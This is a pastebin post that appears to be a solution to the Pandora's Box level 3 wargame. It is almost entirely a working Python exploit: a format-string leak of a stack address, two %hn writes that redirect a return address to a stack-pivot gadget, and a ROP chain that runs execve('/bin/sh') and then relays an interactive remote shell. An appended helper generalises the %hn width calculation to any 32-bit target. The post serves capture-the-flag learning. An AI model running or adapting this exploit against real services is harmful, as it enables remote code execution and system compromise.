Pandoras Box level3

a guest
Sep 17th, 2015
#!/usr/bin/env python3
# A slightly different approach than used here http://jellevergeer.com/pandoras-box-level-3/
#
# This approach is different and avoids having to deal with the stack cookies:
# instead of smashing the buffer, a format-string leak gives us a stack address,
# and two %hn writes redirect the saved return address of "start_game" into a
# stack-pivot gadget that lands in a ROP chain carried in the same buffer.
# Enjoy

import select
import socket
import struct
import sys


REMOTE = '192.168.56.101'
# REMOTE = '127.0.0.1'
PORT   = 44101

mysocket = socket.socket()
mysocket.connect((REMOTE, PORT))

# Obtain a leaked stack address: '9999' is a marker to search for in the echoed
# output, '%08x' prints the first stack word as exactly 8 hex digits after it
mysocket.send(b'9999%08x\n')

# Ensure all response data is returned (the reply may arrive in several chunks)
data = b''
while True:
    chunk = mysocket.recv(1024)
    if not chunk:
        sys.exit("connection closed before the leak arrived")
    data += chunk
    addr_loc = data.find(b'9999')
    if addr_loc != -1 and len(data) >= addr_loc + 12:
        break

addr = data[addr_loc + 4:addr_loc + 12].decode()
print("leaked stack address is " + addr)

# Calculate offsets for the return address of the function "start_game"
start_game_addr = int(addr, 16) - 48
print("start_game address is  " + hex(start_game_addr))

# Calculate offset for the future "/bin/sh" string sent next
bin_sh_addr = int(addr, 16) + 278
print("bin_sh address is  " + hex(bin_sh_addr))

sploit = b'9999'

sploit += struct.pack('<L', start_game_addr)        # Offsets for 0x080485af (start_game): target of the low-half write, format argument 11
# sploit += struct.pack('<L', 0xCCCCCCCC)       # Debug values

sploit += struct.pack('<L', start_game_addr + 2)    # Offsets for 0x080485af (start_game+2): target of the high-half write, format argument 12
# sploit += struct.pack('<L', 0xDDDDDDDD)       # Debug values

# Change return address from start_game to ROP bootstrap: each %hn stores the
# low 16 bits of printf's byte counter, so the widths are chosen so that the
# counter reads 0x8308 at the first write and 0x080a (mod 0x10000) at the second
sploit += b'%33521x%11$hn'               # 0x080a8308 - add esp,0x10c; ret (low half 0x8308)
sploit += b'%34050x%12$hn'               # 0x080a8308 - add esp,0x10c; ret (high half 0x080a)

sploit += b'\x41' * 0xba                 # Padding because above we moved 0x10c 'up' the stack

# Zero eax
sploit += struct.pack('<L', 0x0809807f)         # xor eax,eax; ret

# Zero ecx + set ebx with addr of '/bin/sh'
sploit += struct.pack('<L', 0x080540cd)         # pop ecx; pop ebx; ret
sploit += b'\x00' * 4 + struct.pack('<L', bin_sh_addr)   # ecx = 0 (argv), ebx = address of /bin/sh

# Zero edx
sploit += struct.pack('<L', 0x080540a6)         # pop edx; ret
sploit += b'\x00' * 4                    # set edx to 0 (envp)

# Set eax to 11 (syscall number for execve on 32-bit x86)
# sploit += struct.pack('<L', 0xEEEEEEEE)       # Debug value
sploit += struct.pack('<L', 0x0806ad3e) * 5     # inc eax; inc eax; ret  (x5 -> eax = 10)
sploit += struct.pack('<L', 0x0806ad3f)         # inc eax; ret           (eax = 11)
sploit += struct.pack('<L', 0x08054820)         # int 0x80; ret          (execve("/bin/sh", NULL, NULL))

# And finally the '/bin/sh' string
sploit += b'////////////////bin/sh\x00'          # Padding then null terminated '/bin/sh'

# Bombs away
mysocket.send(sploit)


# Drop into an interactive shell. The original used telnetlib.Telnet.interact,
# which was removed from the standard library in Python 3.13; a select loop
# relaying stdin to the socket and socket output to stdout does the same job.
def interact(sock):
    while True:
        readable, _, _ = select.select([sock, sys.stdin], [], [])
        if sock in readable:
            out = sock.recv(4096)
            if not out:
                break
            sys.stdout.buffer.write(out)
            sys.stdout.buffer.flush()
        if sys.stdin in readable:
            line = sys.stdin.buffer.readline()
            if not line:
                break
            sock.send(line)


interact(mysocket)
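The `%33521x%11$hn` / `%34050x%12$hn` widths in the script are hard-coded for this binary. As an added example (not part of the original paste, and not the author's code), the helper below derives such a pair for any 32-bit target from the number of bytes printf has already counted, and then replays the fragment the way printf would so the pair can be checked offline before it is fired at a target. The prefix length of 23 is an assumption that reproduces the paste's widths: 12 bytes of our own input (`9999` plus two packed addresses) and 11 bytes of service output before the first padded `%x`. The argument indexes 11 and 12 match the script; the stack address used in the self-check is made up.

```python
# Added example, not from the original paste: derive and verify %hn widths.
import re

HALF = 1 << 16  # %hn stores the low 16 bits of printf's byte counter

_DIRECTIVE = re.compile(r"%(\d+)x|%(\d+)\$hn")


def hn_widths(prefix_len, target, low_first=True):
    """Return the two %Nx widths needed so that consecutive %hn writes leave
    `target` (32-bit) in memory, given `prefix_len` bytes already counted.

    prefix_len covers everything printf has emitted before the first padded
    %x (echoed input plus any banner). The page's widths imply 23 here.
    """
    lo, hi = target & 0xFFFF, (target >> 16) & 0xFFFF
    halves = [lo, hi] if low_first else [hi, lo]
    count = prefix_len
    widths = []
    for half in halves:
        width = (half - count) % HALF
        # A padded %x prints at least as many characters as the argument's hex
        # representation (up to 8 for a 32-bit word), so a width below 8 is
        # not guaranteed to be exact; spin the counter one full cycle instead.
        if width < 8:
            width += HALF
        count += width
        widths.append(width)
    return widths


def build_format(prefix_len, target, first_arg=11):
    """Build '%<w1>x%<n>$hn%<w2>x%<n+1>$hn', low half first, matching the
    script's layout: address at argument n, address+2 at argument n+1."""
    w1, w2 = hn_widths(prefix_len, target)
    return "%{}x%{}$hn%{}x%{}$hn".format(w1, first_arg, w2, first_arg + 1)


def simulate(prefix_len, fmt, arg_addrs, arg_value=0x1):
    """Walk the fragment as printf would: each %Nx adds max(N, digits of the
    argument) to the byte counter; each %k$hn stores the low 16 bits of the
    counter at the address argument k points to (arg_addrs maps k -> addr).
    Returns the 32-bit value reassembled from the two halves in memory."""
    count = prefix_len
    mem = {}
    for m in _DIRECTIVE.finditer(fmt):
        if m.group(1) is not None:
            count += max(int(m.group(1)), len("%x" % arg_value))
        else:
            mem[arg_addrs[int(m.group(2))]] = count & 0xFFFF
    base = min(mem)
    return mem[base] | (mem[base + 2] << 16)


if __name__ == "__main__":
    gadget = 0x080A8308                      # add esp,0x10c; ret (from the script)
    ret_slot = 0xBFFFF000                    # made-up saved return address slot
    fmt = build_format(23, gadget)
    print(fmt)                               # %33521x%11$hn%34050x%12$hn
    got = simulate(23, fmt, {11: ret_slot, 12: ret_slot + 2})
    print(hex(got), "ok" if got == gadget else "MISMATCH")
```

`hn_widths` assumes the padded `%x` consumes a small stack word (one hex digit); if the first format argument is a large value the printed length can exceed the width only when the width is tiny, which is why the helper never emits a width below 8. When the service prints more or less than 11 bytes before echoing input, only `prefix_len` changes; the simulation catches a wrong guess immediately instead of on the target.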